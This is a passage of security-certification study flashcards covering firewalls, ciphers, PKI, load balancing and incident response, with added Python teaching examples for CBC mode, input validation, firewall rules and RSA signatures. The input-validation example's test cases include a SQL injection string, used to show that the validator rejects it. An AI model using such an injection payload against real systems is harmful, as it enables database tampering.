device that sits between users and the external network, receives the user requests and sends the request on their behalf. Useful for caching, access control, URL filtering, content scanning, etc

Network Infrastructure Devices

devices that run behind the scenes to keep the network running but that users don't directly interact with (switches, routers, firewalls, IPS, etc)

modes of operation

ways of applying a block cipher to data longer than one block, e.g. ECB, CBC, CTR, GCM. The mode decides whether blocks are chained together and whether integrity is provided; it is not a different cipher.

shared accounts security concerns (3)

difficult to audit, know who was working. every one shares same resources. password management becomes difficult.

fencing security (3)

difficult to cut or knock over. High. Razor wire

password reuse (2)

difficult to do. systems remember password history and require unique passwords.

Disadvantage of change management for risk management

difficult to implement since formal process can slow down change process.

Screenshots security

difficult to reproduce, even with a disk image

BYOD security issues (2)

difficult to secure such a device: need to protect both types of data. need a policy for when a device is sold or traded

SoC Security

difficult to upgrade, usually replace entire hardware.

Which is more advanced dig or nslookup?

dig

Non-Repudiation Common use cases example

digital signature (example of this Common use case)

DSA is part of what and when was it added?

the Digital Signature Standard (FIPS 186), adopted in 1994.

X.509 KeyUsage extension bits (9)

digitalSignature (0) nonRepudiation (1) keyEncipherment (2) dataEncipherment (3) keyAgreement (4) keyCertSign (5) cRLSign (6) encipherOnly (7) decipherOnly (8)

How would some one try to tap fiber?

direct taps

Parabolic antenna

directional antenna that has curved front that focuses the signals coming in to a single point, the feed horn.

Yagi antenna

directional antenna with high gain

Lockout

disable an account after too many incorrect password attempts.

Disabling unnecessary accounts in OS (4 eg)

disable guest, root, mail,etc. disable interactive logins for accounts used as services

disabling unnecessary services(2)

disable services that are not being used to reduce the attack surface. requires a lot of research to know what each service does.

Things to consider disabling for least functionality (4)

disable: printer installation. changing system time. taking ownership of file system objects. deny log on as a service

IEEE 802.1x (3)

port-based network access control: disallows traffic on the port until the authentication process is complete. uses EAP (eg PEAP) to carry the credentials to an authentication server (eg RADIUS) backed by a centralized user database

Personnel issues: Social media

disclosing meaningful company info by post.

Physical taps (2)

disconnect a link, put this in the middle to capture data from the network. Can be active or passive

Deprovisioning

dismantling and removing an application instance.

Examples of well-defined rules of engagement during an Exercise (2)

do not touch production systems. only focus on test systems

Witness interviews (for forensics) (3)

document quickly as people may not be around later and memories fade. gather many to add evidence and correlate stories. witnesses don't always recognize information as valuable so seek out witnesses and ask right questions

MOA

document where both sides agree to objectives that's usually not legally enforceable.

Proper input validation security (3)

documenting all input methods. checking and correcting all input. use a fuzzer- device that randomly sends info into the inputs of applications.

static code analyzer concerns (2)

doesn't identify everything (e.g. logic flaws). produces a lot of false positives that need sorting

symmetric algorithm disadvantages

doesn't scale well: every pair of parties needs its own shared key, and that key has to be distributed securely.

Somewhere you are disadvantages (2)

IP-based geolocation is less reliable with IPv6 (and can be fooled by VPNs and proxies). geolocation is not a precise identifier of where the user is.

Private CA advantages

don't have to purchase each individual certificate from a 3rd-party CA.

Deprovisioning security (3)

don't leave holes open, and don't close holes that other applications still need. remove firewall rules for the removed app. remove the app's data or move it somewhere else

Table top exercise

don't perform an actual exercise. everyone simply discusses what the steps might be.

Integrity measurement (3)

done by testing application against a well-documented secure baseline. should be performed often. Failures require immediate corrections.

preventive examples (3)

door locks. security guard. firewall. (control example)

Example of times to deploy Incident Response Exercises

during scheduled update session done: annually semi annually etc

Downgrade attack example

e.g. the 2015 FREAK attack forced TLS connections down to 1990s export-grade 512-bit RSA keys

Vulnerable business process example

e.g. 2016 Dridex malware used to steal SWIFT credentials

New threats/zero day example

e.g. WannaCry 2017, which spread through an SMB vulnerability whose patch (MS17-010) had been available since March 2017, two months before the outbreak.

Open door examples found during Active Reconnaissance (2)

e.g. enabled guest account, default passwords, etc.

Shimming example

e.g. use Windows application compatibility shims (Compatibility mode, recorded in the Application Compatibility Shim Cache) to pretend to be an older version of Windows and get around UAC

Automated alerting and triggers examples (5)

e.g. send you a text, call, email or/and automatically Open a ticket, reboot a device

Logs and events anomalies example

e.g. try to take advantage of vulnerabilities for plugins that don't even exist on the network.

Block ciphers security (3)

operates on one fixed-size block at a time. uses symmetric encryption. how the blocks relate to each other (independent in ECB, chained in CBC, etc) depends on the mode of operation.

CBC (3)

each plaintext block is XORed with the previous ciphertext block before being encrypted with the block cipher and key; the output is the next ciphertext block. the first block is XORed with an IV instead. CBC gives confidentiality only: pair it with a MAC, since flipping a ciphertext bit flips the same bit in the next plaintext block.
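Added worked example (not from the original flashcards) of the CBC chaining described above and of the padding a block cipher needs. The block cipher is a toy 8-byte permutation (XOR with the key, then rotate), chosen so the chaining is visible without a crypto library; it has no security. The key, IV and message are constructed for the demo. It also shows the ECB weakness (identical plaintext blocks give identical ciphertext blocks) and the CBC bit-flip malleability that the MAC caveat refers to.

```python
import os

BLOCK = 8  # toy block size in bytes (AES uses 16)


def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    # Stand-in for a real block cipher: XOR with the key, then rotate the bytes.
    # It is an invertible permutation, which is all CBC needs; it is NOT secure.
    x = bytes(a ^ b for a, b in zip(block, key))
    return x[1:] + x[:1]


def toy_block_decrypt(key: bytes, block: bytes) -> bytes:
    x = block[-1:] + block[:-1]
    return bytes(a ^ b for a, b in zip(x, key))


def pad(data: bytes) -> bytes:
    # PKCS#7: always append 1..BLOCK bytes, each equal to the pad length.
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def new_iv() -> bytes:
    return os.urandom(BLOCK)  # a fresh, unpredictable IV per message


def ecb_encrypt(key: bytes, plaintext: bytes) -> bytes:
    pt = pad(plaintext)  # every block encrypted independently
    return b"".join(toy_block_encrypt(key, pt[i:i + BLOCK]) for i in range(0, len(pt), BLOCK))


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    pt = pad(plaintext)
    prev, out = iv, []
    for i in range(0, len(pt), BLOCK):
        prev = toy_block_encrypt(key, xor(pt[i:i + BLOCK], prev))  # XOR, then encrypt
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    prev, out = iv, []
    for i in range(0, len(ciphertext), BLOCK):
        c = ciphertext[i:i + BLOCK]
        out.append(xor(toy_block_decrypt(key, c), prev))  # decrypt, then XOR
        prev = c
    return unpad(b"".join(out))


def demo() -> dict:
    key = bytes.fromhex("0123456789abcdef")  # constructed key
    iv = bytes.fromhex("1122334455667788")   # fixed for reproducibility; use new_iv() in practice
    msg = b"ATTACK!!ATTACK!!"                # two identical 8-byte plaintext blocks
    ecb = ecb_encrypt(key, msg)
    cbc = cbc_encrypt(key, iv, msg)
    # Malleability: flip one bit in ciphertext block 1 and the same bit flips in
    # plaintext block 2 (block 1 is corrupted); padding still checks out, no error.
    tampered = bytearray(cbc)
    tampered[0] ^= 0x01
    flipped = cbc_decrypt(key, iv, bytes(tampered))
    return {
        "ecb_blocks_equal": ecb[:BLOCK] == ecb[BLOCK:2 * BLOCK],
        "cbc_blocks_equal": cbc[:BLOCK] == cbc[BLOCK:2 * BLOCK],
        "roundtrip": cbc_decrypt(key, iv, cbc) == msg,
        "ciphertext_len": len(cbc),  # 16 bytes of data + one full padding block
        "bitflip_hits_next_block": flipped[BLOCK:2 * BLOCK]
        == bytes([msg[BLOCK] ^ 0x01]) + msg[BLOCK + 1:2 * BLOCK],
    }


if __name__ == "__main__":
    print(demo())
```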

Distributed allocation security

easier to add security between all the separated components.

MS-CHAP (and v2) security concerns

the challenge/response is built from DES keys derived from the user's NT hash; an attacker who captures the exchange can brute force those DES keys and recover the NT hash.

Uses for containerization

easy to delete company data while retaining personal data when leaving organization.

Mobile Device Payment methods security

enable/disable with MDM to limit liabilities of your organization.

PEAP (2)

encapsulates EAP in a TLS tunnel. Uses certificate on the server.

RSA uses (5)

encrypt, decrypt, digital signatures. web site (TLS) encryption, digital rights management

Block ciphers (3)

encrypts fixed-length groups of bits. often 64-bit or 128-bit blocks. the last block is padded up to the block size.

SSH

encrypted terminal communication, replaces telnet

IV uses

encryption ciphers, WEP, older SSL implementations

Stream cipher (4)

encryption that is done one bit or byte at a time. High speed. low hardware complexity. symmetric encryption for less overhead.

ECC uses (5)

encryption, digital signatures, pseudo-random generators, ECDSA, on mobile devices, more

Data-at-rest security (5)

encryption: full disk, database, file or folder-level. apply permissions: ACLs, so only authorized users can access

SSL/TLS (2)

encrypts all communication between the browser and the web server. uses public key encryption to authenticate the server and set up a symmetric session key

EAP-TLS (4)

mutual authentication using digital certificates on both the client and the authentication server, inside a TLS tunnel. strong security. wide adoption across wireless network types. support from most of the industry. requires a certificate on every client, so it needs a PKI

SSL/TLS in emails

encrypts the connection between the mail client (or the browser, for webmail) and the mail server. protects mail in transit only, not at rest in the mailbox.

client-side validation

end-user's app makes all checks of data.

integrity

ensures no tampering of data

Test environment (2)

environment where code is put together and seen if it would run in a similar environment that production systems run in. QA tests for bugs here.

Supply chain assessment (4)

evaluate coordination between groups e.g. 3rd parties. identify areas of improvement. optimize IT systems supporting the operation. Document the business process changes to increase efficiency

Default configuration (eg)

every application and network device ships with a default username and password that should be changed. e.g. the Mirai botnet spreads by logging in to IoT devices with a list of default credentials, and its source code is public

Change Management security (2)

every change has a security component that should be evaluated, whether installing security patches or application updates. a change in one location can affect security elsewhere, so the whole application flow must be tested.

GPS tagging security concerns (2)

every document may contain this type of info making a user easy to track. especially if posted to social media.

what happened to all the certificates affected by the Heartbleed vulnerability? (2)

every affected web server certificate was replaced. the old certificates were revoked and added to the CRL

Single CA

everyone receives their certs from one authority

Chain of custody (3)

everyone who touches evidence, documents that they did. evidence is labeled and cataloged. sealed to prevent tampering.

Logs to physical controls (2)

everything can be logged from physical locations: entering parking, identification upon building entry, badge access to doors. to correlating with digital access: allowing logging into a console while in a certain room.

Malwarebytes

example of Advanced Malware Tool

An application is accepting zip codes from a certain country. Thus it only allows entries X characters long with a letter in the X column. This is an example of what?

example of proper input validation
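Added worked example (not from the original flashcards) of the allowlist validation the question describes: fixed length, and letters or digits only in the permitted columns. The country rules, length cap and function names are constructed for the demo. Note the `re.ASCII` flag: by default Python's `\d` also matches Unicode digits such as fullwidth "１", which a lax validator would let through.

```python
import re

# Allowlist per country. re.ASCII keeps \d to 0-9 (without it, \d matches any
# Unicode digit). Rules are simplified for the example; real formats vary.
POSTAL_RULES = {
    "US": re.compile(r"\d{5}(-\d{4})?", re.ASCII),
    "CA": re.compile(r"[A-Z]\d[A-Z] ?\d[A-Z]\d", re.ASCII),  # letters in fixed columns
}

MAX_LEN = 16  # cheap length cap before the regex ever runs


def validate_postal_code(country: str, value: str) -> bool:
    # Validate on the server side: the client may have been bypassed entirely.
    rule = POSTAL_RULES.get(country.upper())
    if rule is None:
        return False            # unknown country: fail closed rather than open
    if len(value) > MAX_LEN:
        return False            # reject oversized input before pattern matching
    # fullmatch anchors both ends, so the length is enforced by the pattern itself
    return rule.fullmatch(value.strip().upper()) is not None


def demo() -> dict:
    # Constructed test inputs: well-formed, malformed, an injection attempt, and
    # fullwidth digits that only look like 0-9.
    cases = [
        ("US", "12345"), ("US", "12345-6789"), ("US", "1234"),
        ("CA", "k1a 0b1"), ("CA", "K1A-0B1"),
        ("US", "12345'; DROP TABLE users;--"), ("US", "１２３４５"), ("XX", "12345"),
    ]
    return {f"{c}:{v}": validate_postal_code(c, v) for c, v in cases}


if __name__ == "__main__":
    for k, ok in demo().items():
        print("accept" if ok else "reject", k)
```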

Metasploit (2)

exploitation framework. Build your own vulnerability tests or use modules in existing exploit databases.

Health Insurance Portability and Accountability Act (HIPAA)

extensive health care standards for storage, use, and transmission of health care info

Methods to take Screenshots (4)

external capture with digital camera or phone. Internal capture with Print Screen key or third party utility

Honeypot (2)

fake system that usually attracts bad guy's automated machines to record their recon. Can make entire virtual worlds.

MFD security concerns

faxed and scanned images can be saved locally and accessed.

Router ACLs (3)

feature of routers used to allow and deny traffic, configure NAT or for QoS functions. Configured on the ingress or egress of an interface. evaluate on certain criteria: Source IP, Destination IP, TCP port numbers, UDP port numbers, ICMP

Geolocation

feature on a mobile device to find its location within feet using GPS, triangulation of signals, etc.

Remote wipe

feature that allows remote removal of all data from a mobile device from any location

Physical controls examples (3)

fences, locks, mantraps (control example)

PKCS #7 (3)

file format that contains certificates and chain certificates. no private keys. stored in ASCII format

client-side validation security

only filters input from well-behaved clients; an attacker can bypass or modify the client, so it improves usability but provides no security on its own. the server must validate everything again.

Packet filters (2)

filters traffic based on inbound and outbound rules. usually a host-based feature on a device or server rather than a network appliance.

vulnerability scanner test type? How it tests

finds vulnerabilities from e.g. missed patches. active test but minimally invasive. Gathers as much info about the OS as possible and users go through it after to sort priorities

Something you are examples (3)

fingerprint, iris scan, voice print

What system is usually integrated with HVAC and why?

fire alarm system so HVAC doesn't provide additional oxygen to feed the fire and limit its impact.

what are on-site tools to mitigate DDoS? (2)

firewall or IPS

stateless firewall

firewall that acts as a packet filter inspecting every packet inbound and outbound against an ACL regardless of past history

application-based firewall

firewall that decodes and analyzes every packet to tell what application is going by.

WAF

firewalls between web clients and web servers that deny unexpected or unauthorized input.

network-based firewall

firewalls configured to filter by TCP/UDP port number

Do stateful firewalls keep track of sessions?

firewalls that keep track of active sessions

stateful firewall

firewalls with ACL that has session tables that registers the destination and source IP and ports and keeps track of that session. Everything within that valid flow is allowed.

Misconfigured firewall (2)

firewalls with rules that provide too much access. often difficult to audit since a lot of organizations have thousands of rules

Custom firmware

firmware installed by jailbreaking/rooting a device to gain access to the OS.

Privacy threshold assessment (3)

first step in the compliance process. identifies business processes that are privacy-sensitive. determines if a privacy impact assessment is required

hard-coded

fix (data or parameters) in a program in such a way that they cannot be altered without modifying the program.

NTPsec

fixed a number of vulnerabilities by cleaning up the code base

AP band selection and bandwidths: 5 GHz

20 MHz channels: 36 through 64 available (every 4, 8 non-overlapping). 68 through 96 not available. 100 through 165 available (17 non-overlapping). channels can be bonded for 40, 80 and 160 MHz.

How can you ensure there is no tampering of evidence? (2)

for physical evidence, we catalog and seal it. for digital evidence, we use a hash.

MOU

formal agreement between two parties a stage above a gentlemen's agreement but not a signed contract or legally binding.

change management

formal process for managing change to avoid downtime, confusion and mistakes.

Threat actor

formal term for bad guy aka malicious actors

DER

format designed specifically for X.509 certificates. binary, not human-readable

PEM uses

format supported on many different platforms, applications, OS

802.11 management frames (2)

frames that make everything work: find AP, manage QoS, associate/disassociate with AP. invisible to the user.

white box

full disclosure pentest of OS, network and services. Usually jumps straight to exploiting

Brute force attack Offline (2)

gain access to the file containing the hashed passwords. large computational resources needed to calculate passwords and try matching them to stored passwords.

Rooting

gaining access to Android OS

Jailbreaking

gaining access to Apple iOS.

intrusive scan

actively attempts to exploit the vulnerability to confirm it exists, and so can disrupt the target. a non-intrusive scan gathers info and tests for the vulnerability without taking advantage of it.

Protocol analyzer (3) what can it find? (2)

gathers packets and presents them in plain English. Over the air or the network. sometimes built into the device, no additional software needed. Identify unknown traffic. Verify packet filtering and security controls.

collectors

gathers the data from the sensors to one place.

Where random number generation is used (2)

generate keys, salted hashes, etc

Hardware or software tokens

generate pseudo-random authentication codes for MFA.

shared account aka

generic account (aka)

Initial exploitation (2)

getting into the network. usually the most challenging part

Network traffic and logs (2)

good for capturing forensic information especially IPS which are specialized for looking for attacks. Some organizations store Raw network data, exact recording of network communication.

Nation states/APT (Internal/external, Level of sophistication, Resources/funding, Intent/motivation)

governments; experts in hacking, usually focused on national security. always external. highest sophistication. targets: military organizations, security sites, financial control systems

Cyber-incident response teams (3)

group that may or may not be part of organizational structure. deployed for events determined by organization. handles security incident response, analysis and reporting.

tuples

the set of fields an ACL rule is matched on, e.g. source IP, destination IP, port number, time of day, application. a 5-tuple is source IP, destination IP, protocol, source port and destination port.
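Added worked example (not from the original flashcards) covering the router ACL, stateless firewall, stateful firewall and tuple cards above: rules are matched on the 5-tuple with first-match-wins and an implicit deny, and the stateful wrapper adds a session table so that the reply to a permitted outbound connection is accepted even though no rule allows it inbound. Addresses come from the documentation ranges and the class and function names are constructed for the demo; a real firewall also tracks TCP state and ages sessions out.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src_ip: str
    dst_ip: str
    proto: str       # "tcp" or "udp"
    src_port: int
    dst_port: int


def _ip_match(want: str, have: str) -> bool:
    # "*" is a wildcard; otherwise match an address against a CIDR network.
    return want == "*" or ipaddress.ip_address(have) in ipaddress.ip_network(want, strict=False)


@dataclass(frozen=True)
class Rule:
    action: str            # "allow" or "deny"
    src_ip: str = "*"
    dst_ip: str = "*"
    proto: str = "*"
    src_port: object = "*"
    dst_port: object = "*"

    def matches(self, p: Packet) -> bool:
        # Evaluate every field of the 5-tuple; all must match for the rule to fire.
        return (_ip_match(self.src_ip, p.src_ip) and _ip_match(self.dst_ip, p.dst_ip)
                and self.proto in ("*", p.proto)
                and self.src_port in ("*", p.src_port)
                and self.dst_port in ("*", p.dst_port))


def stateless_decision(acl: list, p: Packet) -> str:
    # Packet filter: first matching rule wins, implicit deny at the end,
    # and no memory of any packet seen before.
    for rule in acl:
        if rule.matches(p):
            return rule.action
    return "deny"


class StatefulFirewall:
    def __init__(self, acl: list):
        self.acl = acl
        self.sessions = set()   # session table of 5-tuples that were permitted

    def decision(self, p: Packet) -> str:
        key = (p.src_ip, p.dst_ip, p.proto, p.src_port, p.dst_port)
        reverse = (p.dst_ip, p.src_ip, p.proto, p.dst_port, p.src_port)
        if reverse in self.sessions:
            return "allow"              # reply traffic inside an existing flow
        if stateless_decision(self.acl, p) == "allow":
            self.sessions.add(key)      # remember the flow so its replies are accepted
            return "allow"
        return "deny"


def demo() -> dict:
    # Single rule: the inside network may open HTTPS connections outbound.
    acl = [Rule("allow", src_ip="10.0.0.0/24", proto="tcp", dst_port=443)]
    fw = StatefulFirewall(acl)
    outbound = Packet("10.0.0.5", "203.0.113.10", "tcp", 51000, 443)
    reply = Packet("203.0.113.10", "10.0.0.5", "tcp", 443, 51000)
    unsolicited = Packet("198.51.100.7", "10.0.0.5", "tcp", 443, 51000)
    return {
        "outbound": fw.decision(outbound),
        "reply_stateless": stateless_decision(acl, reply),   # no inbound rule: denied
        "reply_stateful": fw.decision(reply),                # in session table: allowed
        "unsolicited": fw.decision(unsolicited),             # looks like a reply, but no session
    }


if __name__ == "__main__":
    print(demo())
```

A stateless filter would need a second rule allowing inbound tcp from source port 443, which an attacker can satisfy by choosing that source port; the session table is what lets the stateful firewall distinguish the real reply from the unsolicited packet.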

shared account examples (2)

guest account. anonymous login

general purpose guides

guides from people who have gone through the process of creating a secure configuration (hardening) for a system.

Hacktivist (Internal/external, Level of sophistication, Resources/funding, Intent/motivation)

hacker with a mission or goal: political agenda or social change. often external. pretty sophisticated: specific hacks, DoS, releasing private info, web site defacing, etc. limited funding, but some crowd source

Something you do examples (2)

handwriting. Typing technique, delays between keystrokes

VM sprawl concerns

hard to deprovision VMs if you do not know which applications they relate to.

loop prevention (2)

hard to troubleshoot but easy to resolve. Spanning Tree Protocol prevents this

Infrastructure as a Service aka

hardware as a service (HaaS aka)

Key stretching example

hash a password, hash the hash of that password, continue

Digital signature process (5)

hashes plaintext. encrypts hash with private key. sends encrypted hash with plaintext. receiver will decrypt hash with public key. compare that hash to a hash of received plaintext.
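Added worked example (not from the original flashcards) of the five signing steps above, using textbook RSA so every step is visible. The key pair is constructed from two known Mersenne primes and there is no padding, which is fine for showing the mechanics but is not how production signatures are made (those use a library with PKCS#1 v1.5 or PSS padding and a full-size key). `sign`, `verify` and the message are the example's own names.

```python
import hashlib

# Constructed key pair: 2^31-1 and 2^61-1 are known primes, so N is about 92 bits.
# Far too small for real use; chosen only so the arithmetic is reproducible.
P = 2 ** 31 - 1
Q = 2 ** 61 - 1
N = P * Q
E = 65537                                 # public exponent
D = pow(E, -1, (P - 1) * (Q - 1))         # private exponent (Python 3.8+ modular inverse)


def digest(message: bytes) -> int:
    # Step 1: hash the plaintext. Reduced mod N so it fits this toy modulus.
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % N


def sign(message: bytes, d: int = D, n: int = N) -> int:
    # Step 2: "encrypt" the hash with the private key. Step 3 is sending
    # (message, signature) together; the message itself stays in the clear.
    return pow(digest(message), d, n)


def verify(message: bytes, signature: int, e: int = E, n: int = N) -> bool:
    # Step 4: recover the hash with the public key.
    # Step 5: compare it to a fresh hash of the received plaintext.
    return pow(signature, e, n) == digest(message)


def demo() -> dict:
    msg = b"Transfer 100 EUR to account 1234"     # constructed message
    sig = sign(msg)
    return {
        "valid": verify(msg, sig),
        # altering one character changes the hash, so the recovered hash no longer matches
        "tampered": verify(b"Transfer 900 EUR to account 1234", sig),
        # a value not produced with the private key does not verify
        "forged": verify(msg, (sig + 1) % N),
    }


if __name__ == "__main__":
    print(demo())
```

Non-repudiation follows from the same check: only the holder of `D` can produce a value that `E` turns back into the message hash, so a valid signature ties the signer to that exact plaintext.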

Key generation policies (2)

have a formal process for when some one is given access to an area or a key. 3rd party or management usually signs off on this.

Change management for risk management (5)

have clear policies for change: know when it occurs. duration of occurrence, installation processes, fallback procedures

deprecated algorithms

have design flaws, vulnerabilities

Role-based awareness training security (2)

have detailed documentation and records in case problems occur. apply it for third-parties as well

Posture assessment (6 eg, 1)

health check for BYOD devices that checks for: malware on the device, updated anti-malware, unauthorized applications, required corporate applications, the mobile device OS/version, disk encryption. should be available for all OS

Special purpose embedded devices: Medical devices examples (2)

heart monitors. insulin pumps

Example of a connection NFC can bootstrap

helps the pairing process for Bluetooth between a mobile device and an accessory

high availability vs redundancy

high availability means always available but redundant systems may need to be powered on.

weak algorithms

how easy it is to brute force these

ARO

how often a threat might occur in a single year.

SMS/MMS

how we send text messages, video, audio, pictures on phones

commercial CA (3)

hundreds that can be used to digitally sign certificates. built-in to the browser. can be used to purchase web site certificates.

Type I hypervisor

hypervisor that runs as its own OS run directly from hardware.

examples of where RTOS is used (3)

industrial equipment. anti-lock brakes on automobiles. military environments

Security Automation

inexpensive implementation of constant security tests that can be set to run automatically starting early on in the development process.

Dumpster diving (2)

info may be thrown out during certain timings. Bad guys may learn these timing to gather info. legal in the US unless local restriction or private property.

Passive Reconnaissance (6)

information gathering phase before pentesting using open sources like: social media. corporate web site may say where offices and data sites are located. online forums, Reddit. social engineering. dumpster diving. Business organization that work with the target

XSS (2)

inject different scripts to websites to have that information be replayed to different users. takes advantage of web application development errors and the trust a user has for a site

Examples of use of third-party libraries and SDKs

input desired values into a 3rd party library which can provide a graphical gauge with a value.

sideloading

installing apps without an app store usually with a jailbroken/rooted device.

Smart card (2)

integrates with devices. may require a PIN

cloud storage in the enterprise security (3)

integrates with enterprise authentication. can be 2 factor authentication (2FA) Strong encryption required.

Self-signed (2)

certificates signed with their own private key (or by your own internal CA) rather than by a public CA; fine for internal use. install the CA certificate/trust chain on all devices so they trust it

License Compliance Violation (2)

invalid licence can make application stop working, or work part of the time which is an issue with data integrity

Clickjacking

is a technique that tricks users into clicking on a malicious link by adding the link to a transparent layer over what appears to be a legitimate web page.

Data exposure security concerns (2)

is data being displayed on screen to others? is it encrypted across the network and where its stored?

RPO

is the maximum targeted period in which data loss might be acceptable

DLP best practice

it can sit on many locations so can consolidate all DLP logs to see what occurred during say a file transfer

SATCOM security

keep all software on these devices updated to the latest version

Master Image security (2)

keep the image updated with security patches, OS updates, service updates. requires a lot of time to test that changes don't affect applications.

public key encryption (3)

keeps a private key on the server. uses asymmetric encryption to transfer symmetric session keys. Symmetric encryption creates a secure fast connection.

Accounting (4)

keeps track of resources used: login time, data sent and received, logout time

SCADA/ICS security (2)

kept on a private segmented network usually with no internet access. tight controls and security.

Proximity Cards examples

keycard door access, library cards, payment systems

Cryptographic keys

keys added to ciphers to encrypt plaintext.

Ephemeral keys

short-lived keys generated for a single session and then discarded (e.g. DHE/ECDHE), so a later key compromise cannot decrypt past sessions (forward secrecy).

IoT Home automation security concerns (2)

know when we are home or not. gaining access can potentially gain access to whole house.

Software as a service security

know which security is available in the cloud.

KeySniffer

known vulnerability in some wireless (non-Bluetooth) keyboards and mice that allows capture and injection of keystrokes and mouse movements over the air.

Vulnerable business process (2)

lack of checks and balances. If the business can be taken advantage of, it will be

Examples of devices that use IEEE 802.1X for Certificate-based authentication (4)

laptops, device storage, separate physical device, or mobile device

HVAC (2)

large complex systems in large enterprises requiring experts in thermodynamics, fluid mechanics and heat transfer to implement. Usually managed centrally.

Distributed Denial of Service

launch a botnet army to bring down a service by overloading the bandwidth.

fighting refactoring

layered approach: update signatures, block known malicious URLs, back up often

interoperability agreements

legal agreements with 3rd-parties when outsourcing services and data to ensure security and control meets organisation requirements

NDA

legal contract that must be signed by employees and third parties to prevent the use and dissemination of confidential information.

Mobile device Recording microphone concerns

legal liabilities different in every situation and state.

Examples of carefully controlled conditions to gain access to keys stored for Key escrow (2)

legal proceedings, court orders

Legal hold (4)

legal technique to keep any data associated with a legal proceeding. hold notification tells what and how much data is preserved. ESI stored in separate repository. may include ongoing preservation of new data created.

Background checks concerns

legalities of what can be done vary by country.

MTBF security (2)

lets us plan for failures. gives us an idea of what we might be able to do to prevent failures

SIEM dashboard (2)

lets you collapse event logs into graphics or charts. break out immediately occurring events, etc

Active tap

lets you switch between many connections and provide additional boost of signal to passing traffic.

How a logic bomb is usually installed

likely left by an insider with administrative privilege.

Mobile Device External media security (2)

limit data written to removable drives. or disable function on MDM

OS least functionality

limit the OS to what is needed for the user or group.

External storage devices security concerns (2)

limited authentication on these devices to view files, concern if lost or stolen. easy to exfiltrate data

Limits to port mirrors (2)

limited based on: what the switch can handle. the amount of bandwidth that can be sent to the analysis tool.

clean desk policy security

limits the exposure of sensitive data to third parties.

Online vs. offline CA advantages

keeping the root CA offline limits exposure: if an online intermediate CA is compromised, only the certificates it issued need to be revoked.

Security advantage of Least privilege on accounts

limits the scope of malicious behavior

Patch management tools

list of all OS and security patches installed on the computer.

cross-referenced online vulnerabilities (2)

list of vulnerabilities found National Vulnerability Database: http://nvd.nist.gov/ and Microsoft Security Bulletins: http://www.microsoft.com/technet/security/current.aspx

Dynamic round-robin scheduling (2)

load balancer scheduling that monitors server load and distribute to the servers with the lowest use. If one server more loaded it uses others first

Weighed round-robin scheduling

load balancer scheduling that prioritizes certain servers to receive more load

Affinity scheduling (2)

load balancer scheduling where each user or application instance is stuck to the same server, mainly because many applications require communication with the same instance. tracked through IP address or session IDs

Active/passive load balancing (3)

load balancing where some servers are active and others on standby. Uses a standby if an active fails. takes the active offline until its repaired.
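Added worked example (not from the original flashcards) of the three scheduling cards above: weighted round-robin, dynamic (lowest-load) selection, and affinity that keeps a session on the server it first landed on. The server pool, weights and session id are constructed for the demo; the `LoadBalancer` class is the example's own.

```python
from itertools import cycle


class LoadBalancer:
    def __init__(self, servers: dict):
        # servers: {name: weight}; constructed example pool
        self.active = {name: 0 for name in servers}   # active sessions per server
        self.sticky = {}                              # session id -> server (affinity)
        # Weighted round-robin: a server with weight 3 appears 3 times in the rotation.
        self._rotation = cycle([name for name, w in servers.items() for _ in range(w)])

    def weighted_round_robin(self) -> str:
        return next(self._rotation)

    def dynamic(self) -> str:
        # Dynamic round-robin: send the request to the server with the lowest load.
        return min(self.active, key=lambda s: self.active[s])

    def affinity(self, session_id: str) -> str:
        # First request for a session picks a server; later requests with the
        # same session id keep going there even if another server is now quieter.
        if session_id not in self.sticky:
            self.sticky[session_id] = self.dynamic()
        return self.sticky[session_id]

    def connect(self, server: str) -> None:
        self.active[server] += 1

    def disconnect(self, server: str) -> None:
        self.active[server] -= 1


def demo() -> dict:
    lb = LoadBalancer({"web1": 3, "web2": 1})
    wrr = [lb.weighted_round_robin() for _ in range(8)]   # web1 gets 3 of every 4
    lb.connect("web1")
    lb.connect("web1")
    dynamic_pick = lb.dynamic()                            # web1 busy, so web2
    first = lb.affinity("sess-42")                         # lands on web2
    lb.connect(first)
    lb.connect("web2")
    lb.connect("web2")                                     # web2 is now the busier one
    again = lb.affinity("sess-42")                         # still web2: sticky wins
    return {"wrr": wrr, "dynamic": dynamic_pick, "affinity_first": first, "affinity_again": again}


if __name__ == "__main__":
    print(demo())
```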

screen lock (2 eg)

lock on mobile devices that requires passwords. e.g. numbers or letters

security against USB on mobile (2)

locked devices don't allow USB connections, enable auto-lock. be aware that phones can connect through USB as storage devices.

CBS (2)

log file of a sfc scan, ( ).log

Anti-virus log

log of how many virus stopped or URLs blocked

Application Whitelisting logs

logged to the Operating system's centralized log.

Non-regulatory example

logging and sharing malicious IP and URLs with others

SIEM (4)

logs the security events of all the devices across the network. provides security alerts from real time info. Has long term storage and log aggregation. data correlation, links diverse data types. forensic analysis- gather details after event.

Fighting Disassociation (3)

use a wired connection (long patch cable). perform a packet capture to confirm it's happening. mostly mitigated on modern equipment by 802.11w protected management frames

Identification of an incident

look for precursors or incident indicators.

what is the objective for dynamic analysis (3 eg)

looking for out of the ordinary results: application crash. server error. exception to normal operation of the application.

dig

lookup info from DNS servers: canonical names, IP addresses, domain names from IP addresses. (more advanced than nslookup)

nslookup OS? uses?

lookup info from DNS servers: canonical names, IP addresses, cache timers. Windows and POSIX-based (already builtin to Linux and mac os) Deprecated (use Dig)

Methods of SATCOM (2)

low earth orbit satellite. geostationary satellite

Goal of redundancy and fault tolerance (2)

maintain uptime and availability of organization. ensure hardware, software and systems keep running after failures occur.

Qualitative risk assessment visual example (3 eg, 4 eg)

make a graph of risk factors e.g. Legacy Windows clients, Untrained Staff, No Anti-Virus Software, and categories of risk associated with those e.g. Impact, ARO, Cost of Controls, Overall Risk.

Key stretching

make a key stronger by performing multiple processes

weak algorithms security

make keys long enough that brute force is impractical.

Obfuscate

make something normally understandable very difficult to understand. (Camouflage)

Obfuscation examples (2)

